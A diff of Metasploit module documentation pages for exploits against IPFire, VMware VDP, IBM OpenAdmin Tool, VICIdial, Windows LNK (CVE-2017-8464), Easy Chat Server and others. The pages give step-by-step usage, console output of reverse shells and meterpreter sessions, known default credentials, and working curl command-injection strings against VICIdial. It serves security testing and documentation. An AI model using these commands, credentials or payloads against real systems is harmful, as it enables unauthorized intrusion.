docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
fi
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@"

15
documentation/modules/auxiliary/client/hwbridge/connect.md
View File

@ -28,13 +28,14 @@ Bluetooth HWBridge adapters, depending on the Operating System, may take several
The following steps were [recorded during the testing of this module](https://github.com/rapid7/metasploit-framework/pull/7795#issuecomment-274302326)
on setting up the [BAFX 34t5](https://bafxpro.com/products/obdreader) with Kali Linux 2016.2 (rolling).
1. Ensure no locks on the Bluetooth device via: `rfkill list` (and subsequent `unblock` commands)
2. Make sure Bluetooth service is started: `/etc/init.d/bluetooth start`, or `bluetoothd`
3. Start bluetoothctl: `bluetoothctl`
4. Turn on scanning: `scan on`
5. Turn on agent: `agent on`
6. Make sure we can see OBDII: `devices`
7. Attempt to pair: `[bluetooth]# pair 00:0D:18:AA:AA:AA`
1. Most Bluetooth HWBridge adapters, speak serial. So you will need to get the ruby gem "serialport": ```gem install serialport```
2. Ensure no locks on the Bluetooth device via: `rfkill list` (and subsequent `unblock` commands)
3. Make sure Bluetooth service is started: `/etc/init.d/bluetooth start`, or `bluetoothd`
4. Start bluetoothctl: `bluetoothctl`
5. Turn on scanning: `scan on`
6. Turn on agent: `agent on`
7. Make sure we can see OBDII: `devices`
8. Attempt to pair: `[bluetooth]# pair 00:0D:18:AA:AA:AA`
```
Attempting to pair with 00:0D:18:AA:AA:AA

43
documentation/modules/auxiliary/dos/smb/smb_loris.md Normal file
View File

@ -0,0 +1,43 @@
## Vulnerable Application
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
The module opens over 64,000 connections to the target service, so please make sure
your system ULIMIT is set appropriately to handle it. A single host running this module
can theoretically consume up to 8GB of memory on the target.
## Verification Steps
Example steps in this format (is also in the PR):
1. Start msfconsole
1. Do: `use auxiliary/dos/smb/smb_loris`
1. Do: `set RHOST [IP]`
1. Do: `run`
1. Target should allocate increasing amounts of memory.
## Scenarios
###
```
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >
msf auxiliary(smb_loris) > run
[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
....
```

62
documentation/modules/auxiliary/gather/asterisk_creds.md Normal file
View File

@ -0,0 +1,62 @@
## Description
This module retrieves SIP and IAX2 user extensions and credentials from Asterisk Call Manager service.
Valid manager credentials are required.
## Vulnerable Application
[Asterisk](http://www.asterisk.org/get-started/features) offers both classical PBX functionality and advanced features, and interoperates with traditional standards-based telephony systems and Voice over IP systems.
This module has been tested successfully on:
* Asterisk Call Manager version 2.10.0 on Asterisk 13.16.0
* Asterisk Call Manager version 1.1 on Asterisk 1.6.2.11
The following software comes with Asterisk preinstalled and can be used for testing purposes:
* [FreePBX](https://www.freepbx.org/downloads/)
* [VulnVoIP](https://www.rebootuser.com/?p=1069)
Note that Asterisk will reject valid authentication credentials when connecting from a network that has not been permitted using the `permit` directive (or is specifically denied in the `deny` directive) in the Asterisk manager configuration file `/etc/asterisk/manager.conf`.
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/gather/asterisk_creds`
3. Do: `set rhost <RHOST>`
4. Do: `set rport <RPORT>` (default: `5038`)
5. Do: `set username <USERNAME>` (default: `admin`)
6. Do: `set password <PASSWORD>` (default: `amp111`)
7. Do: `run`
8. You should get credentials
## Scenarios
```
[*] 172.16.191.229:5038 - Found Asterisk Call Manager version 2.10.0
[+] 172.16.191.229:5038 - Authenticated successfully
[*] 172.16.191.229:5038 - Found 9 users
Asterisk User Credentials
=========================
Username Secret Type
-------- ------ ----
100 sip
103 bbf5d449753391a sip
104 273db6cd9ca402f53354 iax2
105 secret password sip
106 "_" ;) iax2
107 123456789 sip
108 ~!@#$%^&*()_+{} sip
109 antidisestablishment iax2
123 y2u.be/VOaZbaPzdsk iax2
[+] 172.16.191.229:5038 - Credentials saved in: /root/.msf4/loot/20170723052316_default_172.16.191.229_asterisk.user.cr_798166.txt
[*] Auxiliary module execution completed
```

42
documentation/modules/auxiliary/scanner/nntp/nntp_login.md Normal file
View File

@ -0,0 +1,42 @@
## Description
This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension.
This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.
If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
## Vulnerable Application
This module has been tested successfully on:
* [SurgeNews](http://netwinsite.com/surgenews/) on Windows 7 SP 1.
* [SurgeNews](http://netwinsite.com/surgenews/) on Ubuntu Linux.
* [INN2](https://www.eyrie.org/~eagle/faqs/inn.html) on Debian Linux.
## Verification Steps
1. Do: `use auxiliary/scanner/nntp/nntp_login`
2. Do: `set RHOSTS [IP]`
3. Do: `set RPORT [IP]`
4. Do: `run`
## Scenarios
```
msf auxiliary(nntp_login) > run
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'asdf' : 'asdf'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'zxcv' : 'zxcv'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'test' : 'test'
[*] Scanned 1 of 2 hosts (50% complete)
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'asdf' : 'asdf'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'admin' : 'admin'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'user' : 'pass'
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```

66
documentation/modules/auxiliary/scanner/rdp/rdp_scanner.md Normal file
View File

@ -0,0 +1,66 @@
## Vulnerable Application
Any system exposing the remote desktop protocol, RDP, typically on 3389/TCP.
## Verification Steps
1. Do: ```use auxiliary/scanner/rdp/rdp_scanner```
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of RDP
3. Do: ```run```
4. If the host is exposing an identifiable RDP instance, it will print the endpoint.
## Options
There are three options currently supported that control what security protocols to
send in the RDP negotiation request, which can be helpful in identifying RDP
endpoints that might be locked down or configured differently:
**TLS** Set to true to request TLS security support
**CredSSP** Set to true to request CredSSP support
**EarlyUser** Set to true to request Early User Authorization Result PDU support
## Scenarios
```
msf auxiliary(rdp_scanner) > run
[+] 10.4.18.26:3389 - Identified RDP
[+] 10.4.18.22:3389 - Identified RDP
[+] 10.4.18.89:3389 - Identified RDP
[+] 10.4.18.9:3389 - Identified RDP
[+] 10.4.18.67:3389 - Identified RDP
[+] 10.4.18.80:3389 - Identified RDP
[+] 10.4.18.34:3389 - Identified RDP
[+] 10.4.18.70:3389 - Identified RDP
[+] 10.4.18.30:3389 - Identified RDP
[+] 10.4.18.76:3389 - Identified RDP
[+] 10.4.18.13:3389 - Identified RDP
[+] 10.4.18.91:3389 - Identified RDP
[+] 10.4.18.5:3389 - Identified RDP
[+] 10.4.18.47:3389 - Identified RDP
[+] 10.4.18.41:3389 - Identified RDP
[+] 10.4.18.105:3389 - Identified RDP
[*] Scanned 44 of 256 hosts (17% complete)
[*] Scanned 55 of 256 hosts (21% complete)
[+] 10.4.18.118:3389 - Identified RDP
[+] 10.4.18.108:3389 - Identified RDP
[+] 10.4.18.139:3389 - Identified RDP
[*] Scanned 94 of 256 hosts (36% complete)
[*] Scanned 110 of 256 hosts (42% complete)
[+] 10.4.18.157:3389 - Identified RDP
[+] 10.4.18.166:3389 - Identified RDP
[+] 10.4.18.164:3389 - Identified RDP
[+] 10.4.18.170:3389 - Identified RDP
[+] 10.4.18.185:3389 - Identified RDP
[+] 10.4.18.209:3389 - Identified RDP
[+] 10.4.18.188:3389 - Identified RDP
[*] Scanned 156 of 256 hosts (60% complete)
[+] 10.4.18.237:3389 - Identified RDP
[+] 10.4.18.225:3389 - Identified RDP
[*] Scanned 186 of 256 hosts (72% complete)
[*] Scanned 194 of 256 hosts (75% complete)
[*] Scanned 208 of 256 hosts (81% complete)
[*] Scanned 253 of 256 hosts (98% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```

48
documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md Normal file
View File

@ -0,0 +1,48 @@
## Vulnerable Application
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
This module has been verified against:
1. 2.19 core 100
2. 2.19 core 110 (exploit-db, not metasploit module)
## Verification Steps
1. Install the firewall
2. Start msfconsole
3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
4. Do: ```set password admin``` or whatever it was set to at install
5. Do: ```set rhost 10.10.10.10```
6. Do: ```set payload cmd/unix/reverse_perl```
7. Do: ```set lhost 192.168.2.229```
8. Do: ```exploit```
9. You should get a shell.
## Options
**PASSWORD**
Password is set at install. May be blank, 'admin', or 'ipfire'.
## Scenarios
```
msf > use exploit/linux/http/ipfire_oinkcode_exec
msf exploit(ipfire_oinkcode_exec) > set password admin
password => admin
msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
rhost => 192.168.2.201
msf exploit(ipfire_oinkcode_exec) > set verbose true
verbose => true
msf exploit(ipfire_oinkcode_exec) > check
[*] 192.168.2.201:444 The target appears to be vulnerable.
msf exploit(ipfire_oinkcode_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
id
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
whoami
nobody
```

31
documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md Normal file
View File

@ -0,0 +1,31 @@
## Vulnerable Application
VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.
## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/ssh/vmware_vdp_known_privkey`
3. Do: `set rhost 1.2.3.4`
4. Do: `exploit`
5. You should get a shell.
6. Type: `sudo -s` to become root user
## Scenarios
This is a run against a known vulnerable vSphere Data Protection appliance.
```
msf > use exploit/linux/ssh/vmware_vdp_known_privkey
msf exploit(vmware_vdp_known_privkey) > set rhost 1.2.3.4
rhost => 1.2.3.4
msf exploit(vmware_vdp_known_privkey) > run
[+] Successful login
[*] Found shell.
[*] Command shell session 1 opened (1.2.3.5:34147 -> 1.2.3.4:22) at 2017-01-20 20:43:22 +0100
```
## Further Information
The default account of the appliance is root:changeme

55
documentation/modules/exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec.md Normal file
View File

@ -0,0 +1,55 @@
## Description
This module exploits an unauthenticated remote PHP code execution vulnerability in [IBM OpenAdmin Tool](https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.oat.doc/ids_oat.htm) included with IBM Informix versions 11.5, 11.7, and 12.1.
The *welcomeServer* SOAP service does not properly validate user input in the *new_home_page* parameter of the *saveHomePage* method allowing arbitrary PHP code to be written to the *config.php* file. The *config.php* file is executed in most pages within the application, and accessible directly via the web root, resulting in code execution.
**Note: If malformed PHP code is written to the *config.php* file the application fails to process subsequent requests to set *new_home_page*, rendering the application unexploitable.**
For this reason, the module first writes a PHP `eval()` backdoor to the *config.php* file, then the payload is provided as PHP code in a HTTP POST request for execution.
By default, a backup of the existing *config.php* is written to *BAKconfig.php*. Replacing the *config.php* file with *BAKconfig.php* will remove the backdoor.
## Vulnerable Application
The IBM&reg; OpenAdmin Tool (OAT) for Informix&reg; is a web application for administering and analyzing the performance of IBM Informix database servers. You can administer multiple database server instances from a single OAT installation on a web server. You can access the web server through any browser to administer all your database servers.
This module has been tested successfully on IBM OpenAdmin Tool 3.14 on Informix 12.10 Developer Edition (SUSE Linux 11) virtual appliance.
* [Informix 12.10 Developer Edition SLES 11 virtual appliance demo (Developer Edition 32 bit) VMware Workstation](https://www-01.ibm.com/marketing/iwm/iwm/web/reg/download.do?source=swg-informixfpd&S_PKG=dl&lang=en_US&cp=UTF-8&dlmethod=http)
## Verification Steps
1. Start `msfconsole`
2. Do: `exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec`
3. Do: `set rhost [IP]`
4. Do: `run`
5. You should get a session
## Scenarios
### IBM OpenAdmin Tool 3.14 on Informix 12.10 Developer Edition (SUSE Linux 11) Virtual Appliance
```
msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > check
[*] 172.16.191.208:80 The target service is running, but could not be validated.
msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.208:80 Wrote backdoor to config.php file successfully
[*] Sending stage (33986 bytes) to 172.16.191.208
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.208:39840) at 2017-05-31 08:01:49 -0400
[!] 172.16.191.208:80 Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor
meterpreter > sysinfo
Computer : informixva
OS : Linux informixva 2.6.27.39-0.3-vmi #1 SMP 2009-11-23 12:57:38 +0100 i686
Meterpreter : php/linux
meterpreter > getuid
Server username: daemon (2)
meterpreter >
```

142
documentation/modules/exploit/multi/misc/msf_rpc_console.md Normal file
View File

@ -0,0 +1,142 @@
## Description
This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface.
## Vulnerable Application
[Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.
To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole.
This module has been tested successfully on:
* Metasploit 4.15 on Kali 1.0.6
* Metasploit 4.14 on Kali 2017.1
* Metasploit 4.14 on Windows 7 SP1
Source and Installers:
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/multi/misc/msf_rpc_console`
3. Do: `set RHOST [IP]`
4. Do: `set RPORT [PORT]` (default: `55552`)
5. Do: `set USERNAME [USERNAME]` (default: `msf`)
6. Do: `set PASSWORD [PASSWORD]`
7. Do: `set LHOST [IP]`
8. Do: `run`
9. You should get a session
## Options
**Username**
The username for Metasploit RPC (default: `msf`).
**Password**
The password for the RPC user.
## Scenarios
### Ruby Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 0
msf exploit(msf_rpc_console) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #0
[*] 172.16.191.166:55552 - Sending payload...
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400
whoami
win-sgbsd5tqutq\user
```
### Windows CMD Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 1
msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf exploit(msf_rpc_console) > run
[*] Started reverse SSL handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #1
[*] 172.16.191.166:55552 - Sending payload...
[*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400
Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\metasploit>whoami
win-sgbsd5tqutq\user
```
### Unix CMD Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.215
rhost => 172.16.191.215
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 2
target => 2
msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(msf_rpc_console) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.215:55552 - Authenticated successfully
[*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
[*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
[*] 172.16.191.215:55552 - API version 1.0
[+] 172.16.191.215:55552 - Created console #0
[*] 172.16.191.215:55552 - Sending payload...
[*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400
id
uid=0(root) gid=0(root) groups=0(root)
```

133
documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md Normal file
View File

@ -0,0 +1,133 @@
## Description
This module exploits a vulnerability in VICIdial versions 2.9 RC1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default).
When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to `exec()`.
This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
## Vulnerable Application
VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well.
This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
Installers:
* [VICIdial 2.11 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download)
* [VICIdial 2.13 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.13rc1.zip/download)
Follow the [instructions to enabled password encryption](http://vicidial.org/docs/ENCRYPTED_PASSWORDS.txt).
## Technical Details
The `functions.php` file defines a function called `user_authorization`:
```php
function user_authorization($user,$pass,$user_option,$user_update)
```
This function is used throughout the application to validate user logon credentials supplied using HTTP basic authentication. If password encryption is enabled the user's password is passed to the `pass` argument of the `bp.pl` Perl script, without quotes, using PHP's `exec()` function:
```php
if ($SSpass_hash_enabled > 0)
{
if (file_exists("../agc/bp.pl"))
{$pass_hash = exec("../agc/bp.pl --pass=$pass");}
else
{$pass_hash = exec("../../agc/bp.pl --pass=$pass");}
```
A rudimentary blacklist is used to prevent command injection. The apostrophe `'`, quote `"`, semi-colon `;` and backslash `\` characters are removed from the user's username and password using `preg_replace`, like so:
```php
$user = preg_replace("/\'|\"|\\\\|;/","",$user);
$pass = preg_replace("/\'|\"|\\\\|;/","",$pass);
```
It is trivial to bypass the blacklist.
For example, backticks ``` ` ```, pipe `|` or ampersand `&` are sufficient to bypass the blacklist and execute arbitrary operating system commands.
For the purposes of exploitation, reaching the `user_authorization` function call with malicious input is hindered by additional input validation in use prior to the authentication check throughout the majority of the codebase:
```php
$PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_USER);
$PHP_AUTH_PW = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_PW);
```
However, in VICIdial version 2.11RC2, at least two files did not make use of the additional validation:
* help.php
* vicidial_sales_viewer.php
In VICIdial version 2.13RC1, at least one file did not make use of the additional validation:
* vicidial_sales_viewer.php
This vulnerability was patched in revision 2759.
## Proof of Concept
```bash
$ curl -isk "https://VICIdial.local/vicidial/vicidial_sales_viewer.php" \
--user 'anyusername:anypassword& id>/tmp/pwned_by_sales_viewer #'
```
```bash
$ curl -isk "https://VICIdial.local/vicidial/help.php" \
--user 'anyusername:anypassword& id>/tmp/pwned_by_help #'
```
Note that `/tmp/pwned_by_help` and `/tmp/pwned_by_sales_viewer` files should contain the results of the `id` command.
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec`
3. Do: `set rhost [IP]`
4. Do: `run`
5. You should get a session
## Sample Output
```
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
[*] 172.16.191.150:80 The target appears to be vulnerable.
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[*] 172.16.191.150:80 Sending payload (505 bytes)
[+] 172.16.191.150:80 Payload sent successfully
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.150:36660) at 2017-05-27 01:00:41 -0400
id
uid=48(apache) gid=48(apache) groups=48(apache)
```
## Sample Output (Verbose)
```
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set verbose true
verbose => true
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
[*] 172.16.191.150:80 Password encryption is supported, but may not be enabled.
[*] 172.16.191.150:80 The target appears to be vulnerable.
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[*] 172.16.191.150:80 Sending payload (505 bytes)
[+] 172.16.191.150:80 Payload sent successfully
[*] Command shell session 2 opened (172.16.191.181:4444 -> 172.16.191.150:36661) at 2017-05-27 01:00:48 -0400
id
uid=48(apache) gid=48(apache) groups=48(apache)
```

109
documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md Normal file
View File

@ -0,0 +1,109 @@
## Vulnerable Application
This vulnerability affects any Windows version without the patch for
CVE-2017-8464. The exploit does not appear to work with UNC drives. Because of
this, the exploit DLL file needs to be on a local file system or an USB drive.
A fix was released in the June 2017 Patch Tuesday.
## Vulnerable Setup
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are installed.
## Verification Steps
### Start a handler
1. `use exploit/multi/handler`
2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
3. `set LHOST [ip victim connects back to]`
4. `exploit -j`
5. `back`
### Run the exploit
1. `use exploit/windows/fileformat/cve_2017_8464_lnk_rce`
2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
3. `set LHOST [ip victim connects back to]`
4. `exploit`
### Copy files to USB drive & open on vulnerable system
1. `cp /root/.msf4/local/* [USB drive path]`
2. Insert device in target machine and browse to it
## Options
**FILENAME**
The file name of the LNK file. This file name can be renamed later. If the value is not set, a random name will be generated.
**DLLNAME**
The file name of the DLL file. This file cannot be renamed, as this will invalidate the LNK file(s). If not set, a random name will be generated.
**DRIVE**
Drive letter assigned to USB drive on victim's machine. If not set, LNK files for drive D till Z will be created. Copy all these LNK files to the USB drive to increase the chance that the vulnerability will be triggered.
### Windows 10 x64 (Build 14393)
```
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.146.197:4444
[*] Starting the payload handler...
msf exploit(handler) > back
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(cve_2017_8464_lnk_rce) > exploit
msf exploit(cve_2017_8464_lnk_rce) > exploit
[*] /root/.msf4/local/kNgYlztVprHPOmHY.dll created, copy it to the root folder of the target USB drive
[*] /root/.msf4/local/SoXXZhgCWEDkbDyA_D.lnk created, copy to the target USB drive
[*] /root/.msf4/local/rfuSAlSFEPmrgsBh_E.lnk created, copy to the target USB drive
[*] /root/.msf4/local/LydLhRBovVRINgUh_F.lnk created, copy to the target USB drive
[*] /root/.msf4/local/xbpnlkcQOYonGpKW_G.lnk created, copy to the target USB drive
[*] /root/.msf4/local/SezkrIUwqIVvMiOZ_H.lnk created, copy to the target USB drive
[*] /root/.msf4/local/UzsJRIdcpoZPpLEj_I.lnk created, copy to the target USB drive
[*] /root/.msf4/local/BxTkakFYhUaxSNyi_J.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dPdanTusElQRKzGZ_K.lnk created, copy to the target USB drive
[*] /root/.msf4/local/cKUaDslpjLshMEpP_L.lnk created, copy to the target USB drive
[*] /root/.msf4/local/RQPOxJeuGqVCQGNB_M.lnk created, copy to the target USB drive
[*] /root/.msf4/local/tLDnpaeIeUavIxqP_N.lnk created, copy to the target USB drive
[*] /root/.msf4/local/VVQOvhpqJYbhINIX_O.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dAIEBrbaixsXjnnm_P.lnk created, copy to the target USB drive
[*] /root/.msf4/local/AoHnIQhKkpnYSOZR_Q.lnk created, copy to the target USB drive
[*] /root/.msf4/local/kZCCppTXKsuGRSCB_R.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vMBPqzoOEoJXhZqQ_S.lnk created, copy to the target USB drive
[*] /root/.msf4/local/ueCsaNzVsljfHKnS_T.lnk created, copy to the target USB drive
[*] /root/.msf4/local/TSCgPoYrFFnZqMsl_U.lnk created, copy to the target USB drive
[*] /root/.msf4/local/QFbXkQeBmCvXezNg_V.lnk created, copy to the target USB drive
[*] /root/.msf4/local/liPaOopqYJbBIrVY_W.lnk created, copy to the target USB drive
[*] /root/.msf4/local/eZiWpyEYbkWHqStW_X.lnk created, copy to the target USB drive
[*] /root/.msf4/local/PawzVPKmvBoSblhA_Y.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vJhDzJUydwYxnLlp_Z.lnk created, copy to the target USB drive
msf exploit(cve_2017_8464_lnk_rce) >
[*] Sending stage (1189423 bytes) to 192.168.146.193
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.193:50020) at 2017-07-25 19:28:27 +0200
sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP-5G8HK7E
OS : Windows 10 (Build 14393).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
```

53
documentation/modules/exploit/windows/http/easychatserver_seh.md Normal file
View File

@ -0,0 +1,53 @@
## Description
This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability.
This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application
## Vulnerable Application
[Easy Chat Server](http://echatserver.com/) Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.
This module has been tested successfully on
* Easy Chat Server 3.1 on Windows XP En SP3
Installers:
[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe)
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploits/windows/http/easychatserver_seh`
3. Do: `set rhosts [IP]`
4. Do: `exploit`
5. You should get your payload executed
## Scenarios
```
marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easychatserver_seh) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
meterpreter > sysinfo
Computer : MM-8B040C5B05D9
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
msf exploit(easychatserver_seh) >
```

22
modules/exploits/windows/http/easyfilesharing_post.md → documentation/modules/exploit/windows/http/easyfilesharing_post.md
View File

@ -1,8 +1,8 @@
## Description
This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain.
This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain.
This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application
